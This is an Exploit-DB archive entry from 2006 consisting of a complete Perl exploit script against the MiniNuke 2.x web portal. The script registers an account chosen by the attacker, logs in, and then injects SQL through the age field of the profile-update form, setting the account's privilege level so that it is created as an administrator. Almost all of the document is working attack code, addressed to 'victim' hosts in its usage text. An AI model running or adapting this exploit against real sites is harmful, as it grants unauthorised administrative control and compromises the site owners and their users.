MiniNuke 2.x - SQL Injection (Add Admin)

EDB-ID:

1837

CVE:

N/A

Author:

nukedx

Type:

webapps

Platform:

ASP

Published:

2006-05-27

#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
  print "\n- NukedX Security Advisory Nr.2006-31\r\n";
  print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
}
sub usage() 
{
  header();
  print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
  print "- <host> -> Victim's host ex: www.victim.com\r\n";
  print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
  print "- <user> -> Desired username to create ex: h4x0r\r\n";
  print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
  print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
  exit();
}
sub exploit () 
{
  #Our variables...
  $mnserver = $ARGV[0];
  $mnserver =~ s/(http:\/\/)//eg;
  $mnhost   = "http://".$mnserver;
  $mndir    = $ARGV[1];
  $mnuser   = $ARGV[2];
  $mnpass   = $ARGV[3];
  $mnmail   = $ARGV[4];
  $mnport   = "80";
  #Sending data...
  header();
  print "- Trying to connect: $mnserver\r\n";
  getsession();
}
sub getsession ()
{
  print "- Getting session for register...\r\n";
  $mnstar   = "membership.asp?action=new";
  $mnsreq   = $mnhost.$mndir.$mnstar;
  $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
  print $mns "GET $mnsreq HTTP/1.1\n";
  print $mns "Accept: */*\n";
  print $mns "Referer: $mnhost\n";
  print $mns "Accept-Language: tr\n";
  print $mns "User-Agent: NukeZilla\n";
  print $mns "Cache-Control: no-cache\n";
  print $mns "Host: $mnserver\n";
  print $mns "Connection: close\n\n";
  print "- Connected...\r\n";
  while ($answer = <$mns>) { 
    if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
    if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
  }
  #if you are here...
  die "- Exploit failed\r\n";
}
sub doregister ()
{
  close($mns);
  $mntar    = "membership.asp?action=register";
  $mnreq    = $mnhost.$mndir.$mntar;
  print "- Session getting done\r\n";
  print "- Lets create our user...\r\n";
  $mndata = "kuladi=".$mnuser;
  $mndata.= "&password=".$mnpass;
  $mndata.= "&email=".$mnmail;
  $mndata.= "&isim=h4x0r";
  $mndata.= "&g_soru=whooooo";
  $mndata.= "&g_cevap=h4x0rs";
  $mndata.= "&icq=1";
  $mndata.= "&msn=1";
  $mndata.= "&aim=1";
  $mndata.= "&sehir=1";
  $mndata.= "&meslek=1";
  $mndata.= "&cinsiyet=b";
  $mndata.= "&yas_1=1";
  $mndata.= "&yas_2=1";
  $mndata.= "&yas_3=1920";
  $mndata.= "&web=http://www.milw0rm.com";
  $mndata.= "&imza=h4x0r";
  $mndata.= "&mavatar=IMAGES/avatars/1.gif";
  $mndata.= "&security_code=".$mngvn;
  $mndata.= "&mail_goster=on";
  $mndatalen = length($mndata);
  $mn =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
  print $mn "POST $mnreq HTTP/1.1\r\n";
  print $mn "Accept: */*\r\n";
  print $mn "Referer: $mnhost\r\n";
  print $mn "Accept-Language: tr\r\n";
  print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
  print $mn "Accept-Encoding: gzip, deflate\r\n";
  print $mn "User-Agent: NukeZilla\r\n";
  print $mn "Cookie: $mncookie\r\n";
  print $mn "Host: $mnserver\r\n";
  print $mn "Content-length: $mndatalen\r\n";
  print $mn "Connection: Keep-Alive\r\n";
  print $mn "Cache-Control: no-cache\r\n\r\n";
  print $mn $mndata;
  print $mn "\r\n\r\n";
  while ($answer = <$mn>) { 
    if ($answer =~ /Tebrikler !!!/) { 
      print "- Creating user has been done...\r\n"; 
      print "- Loginning in to user...\r\n";
      dologin();
    }
  }
  #if you are here...
  die "- Exploit failed\r\n";
}
sub dologin ()
{
  close ($mn);
  $mnltar  = "enter.asp";
  $mnlreq  = $mnhost.$mndir.$mnltar;
  $mnldata = "kuladi=".$mnuser;
  $mnldata.= "&password=".$mnpass;
  $mnldata.= "&guvenlik=423412";
  $mnldata.= "&gguvenlik=423412";
  $mnldatalen = length($mnldata);
  $mnl =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
  print $mnl "POST $mnlreq HTTP/1.1\r\n";
  print $mnl "Accept: */*\r\n";
  print $mnl "Referer: $mnhost\r\n";
  print $mnl "Accept-Language: tr\r\n";
  print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
  print $mnl "Accept-Encoding: gzip, deflate\r\n";
  print $mnl "User-Agent: NukeZilla\r\n";
  print $mnl "Host: $mnserver\r\n";
  print $mnl "Content-length: $mnldatalen\r\n";
  print $mnl "Connection: Keep-Alive\r\n";
  print $mnl "Cache-Control: no-cache\r\n\r\n";
  print $mnl $mnldata;
  print $mnl "\r\n\r\n";
  while ($answer = <$mnl>) { 
    if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
    if ($answer =~ /Cache-control:/) { doadmin(); }
   }
  #if you are here...
  die "- Exploit failed\r\n";
}
sub doadmin ()
{
  close($mnl);
  print "- Editing profile..\r\n";
  $mnptar  = "Your_Account.asp?op=UpdateProfile";
  $mnpreq  = $mnhost.$mndir.$mnptar;
  $mnpdata.= "email=".$mnmail;
  $mnpdata.= "&isim=h4x0r";
  $mnpdata.= "&g_soru=whooooo";
  $mnpdata.= "&g_cevap=h4x0rs";
  $mnpdata.= "&icq=1";
  $mnpdata.= "&msn=1";
  $mnpdata.= "&aim=1";
  $mnpdata.= "&sehir=1";
  $mnpdata.= "&meslek=1";
  $mnpdata.= "&cinsiyet=b";
  $mnpdata.= "&yas_1=1";
  $mnpdata.= "&yas_2=1";
  $mnpdata.= "&yas_3=1920',seviye='1";
  $mnpdata.= "&web=http://www.milw0rm.com";
  $mnpdata.= "&imza=h4x0r";
  $mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
  $mnpdata.= "&mail_goster=on";
  $mnpdatalen = length($mnpdata);
  $mnp =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
  print $mnp "POST $mnpreq HTTP/1.1\r\n";
  print $mnp "Accept: */*\r\n";
  print $mnp "Referer: $mnhost\r\n";
  print $mnp "Accept-Language: tr\r\n";
  print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
  print $mnp "Accept-Encoding: gzip, deflate\r\n";
  print $mnp "User-Agent: NukeZilla\r\n";
  print $mnp "Cookie: $mnlcookie\r\n";
  print $mnp "Host: $mnserver\r\n";
  print $mnp "Content-length: $mnpdatalen\r\n";
  print $mnp "Connection: Keep-Alive\r\n";
  print $mnp "Cache-Control: no-cache\r\n\r\n";
  print $mnp $mnpdata;
  print $mn "\r\n\r\n";
  while ($answer = <$mnp>) { 
    if ($answer =~ /Tebrikler !!!/) { 
      print "- Editing profile been done...\r\n"; 
      print "- Exploiting finished succesfully\r\n";
      print "- Your username $mnuser has been created as admin\r\n";
      print "- You can login with password $mnpass on $mnlreq\r\n";
      exit();
    }
    if ($answer =~ /Üyeler Açýktýr/) { 
      print "- Exploit failed\r\n";
      exit();
    }
  }
  #if you are here...
  die "- Exploit failed\r\n";
}
# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-27]